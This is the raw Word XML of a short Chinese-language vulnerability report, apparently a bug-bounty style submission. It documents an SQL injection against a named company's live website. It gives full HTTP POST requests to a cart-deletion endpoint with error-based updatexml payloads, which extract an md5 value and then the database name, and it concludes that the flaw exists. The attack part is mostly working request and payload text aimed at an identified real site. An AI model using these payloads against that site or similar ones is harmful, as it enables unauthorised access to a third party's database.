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3502" w14:textId="58397158" w:rsidR="002A0D48" w:rsidRPr="00863CCE" w:rsidRDefault="00863CCE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863CCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>湖南弘林科学仪器有限公司</w:t>
      </w:r>
      <w:r w:rsidRPr="00863CCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>sql注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B569D9C" w14:textId="54F81F2F" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CC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网站首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFF1DDC" w14:textId="2F29513F" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00EF7B94">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://www.hnsyyq.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C429232" w14:textId="6946B060" w:rsidR="00863CCE" w:rsidRPr="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57E94A16" wp14:editId="3242500B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FF06" w14:textId="68E179BD" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2抓包修改poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B624B" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>POST /delete_cart_goods.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336C324" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Host: www.hnsyyq.com:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E92B7E" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3684CB" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Content-Length: 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891620C" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6B3B55" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Accept-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFDE9C" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE"/>
    <w:p w14:paraId="2D08489D" w14:textId="299BB906" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>id=0||(updatexml(1,concat(0x7e,(select%20md5(111)),0x7e),1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD3EDE" w14:textId="1BF00A3C" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62C555D2" wp14:editId="5DFFB6C1">
            <wp:extent cx="5274310" cy="30575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0508" w14:textId="6DEFCE19" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C27F55" wp14:editId="0D90E4C7">
            <wp:extent cx="5274310" cy="1686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01BF" w14:textId="06DAFEEA" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到执行了md5（111）的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7202EB" w14:textId="6D048326" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3查看库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61284C74" w14:textId="3508643E" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4DA6E" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>POST /delete_cart_goods.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C9390" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Host: www.hnsyyq.com:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD5E0D6" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F76AB" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Content-Length: 66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F183A96" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C7CBC" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:r>
        <w:t>Accept-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A1609" w14:textId="77777777" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE"/>
    <w:p w14:paraId="1DFA6243" w14:textId="514C13A9" w:rsidR="00863CCE" w:rsidRDefault="00863CCE" w:rsidP="00863CCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>id=0||(updatexml(1,concat(0x7e,(select%20database()),0x7e),1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9CCAA0" w14:textId="1D3F9D43" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C80DA4C" wp14:editId="1D6B9F29">
            <wp:extent cx="5274310" cy="3057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4D68" w14:textId="224EBF6A" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到执行了database(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，获取到了库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D991B4" w14:textId="4B6B35FB" w:rsidR="00863CCE" w:rsidRDefault="00863CCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞存在</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00863C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E0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23D035CA"/>
    <w:lvl w:ilvl="0" w:tplc="4B70631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5061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34"/>
    <w:rsid w:val="002A0D48"/>
    <w:rsid w:val="00863CCE"/>
    <w:rsid w:val="008E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6B03"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C720DFF3-DDAB-4405-8D8F-229B7F4B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CC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63CC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3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hnsyyq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川田</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>川田</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-06T07:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-06T07:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>